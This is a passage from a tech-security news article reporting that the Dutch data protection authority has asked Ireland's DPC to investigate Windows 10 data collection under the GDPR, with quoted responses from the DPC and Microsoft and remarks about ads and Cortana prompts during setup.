The DPA said on Tuesday that the changes made in the April 2018 Windows update have led to “an actual improvement” in data privacy. But at the same time, it appears that… “Microsoft also collects other data from remote users.” Upshot:

As a result, Microsoft may still violate the privacy rules.

Therefore, the DPA says, it’s time for the lead privacy regulator in Europe – that would be the Irish DPC – to investigate further concerns about how Windows collects user data.

User beware

The Dutch data privacy regulator is also advising Windows users to “pay close attention to privacy settings when installing and using this software.”

Microsoft is permitted to process personal data if consent has been given in the correct way. We’ve found that Microsoft collect diagnostic and non-diagnostic data. We’d like to know if it is necessary to collect the non-diagnostic data and if users are well informed about this.

Does Microsoft collect more data than they need to (think about data minimalization as a base principle of the GDPR)? Those questions can only be answered after further examination.

The Irish DPC confirmed to TechCrunch that it received the Dutch regulator’s concerns last month. The publication quoted a DPC spokeswoman:

Since then the DPC has been liaising with the Dutch DPA to further this matter. The DPC has had preliminary engagement with Microsoft and, with the assistance of the Dutch authority, we will shortly be engaging further with Microsoft to seek substantive responses on the concerns raised.

And this is what Microsoft had to say on the matter:

The Dutch data protection authority has in the past brought data protection concerns to our attention, which related to the consumer versions of Windows 10, Windows 10 Home and Pro. We will work with the Irish Data Protection Commission to learn about any further questions or concerns it may have, and to address any further questions and concerns as quickly as possible.

Microsoft is committed to protecting our customers’ privacy and putting them in control of their information. Over recent years, in close coordination with the Dutch data protection authority, we have introduced a number of new privacy features to provide clear privacy choices and easy-to-use tools for our individual and small business users of Windows 10. We welcome the opportunity to improve even more the tools and choices we offer to these end users.

Are you so over ads while onboarding?

As one reader noted when we wrote up the 2017 privacy dashboard introduction, they were seeing ads every time they logged on to Windows 10. TechCrunch notes that during the onboarding process for Windows 10, Microsoft makes multiple requests to process user data for various reasons, including to serve ads to users.

As Naked Security’s Paul Ducklin responded at the time, he never saw ads on Windows 10, including at login, in spite of installing and reinstalling the operating system “any number of times” in the test rig he was using to get malware screenshots to use in his articles. But then, he knows where to look for the right options, he said:

When I do my installs I pick ‘custom’ and not ‘express settings’ at the relevant setup configuration prompt, and then turn all the options off using the toggles. I assume this helps reduce the tat that I see compared to what some other people are seeing.

TechCrunch also noted that Windows 10 uses its digital assistant, Cortana, to provide a running commentary on settings screens, including nudges to agree to the company’s T&Cs… if you want to run Windows, that is. From TechCrunch:

‘If you don’t agree, y’know, no Windows!’ the human-sounding robot says at one point.

Is that nudging one of the DPA’s concerns? It’s not clear yet. Time will tell, so tune in to next month’s (or next year’s) episode as this long-running privacy-regulator wrestling match continues. We’ll let you know what we find out!

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/0qhmDvOnAaI/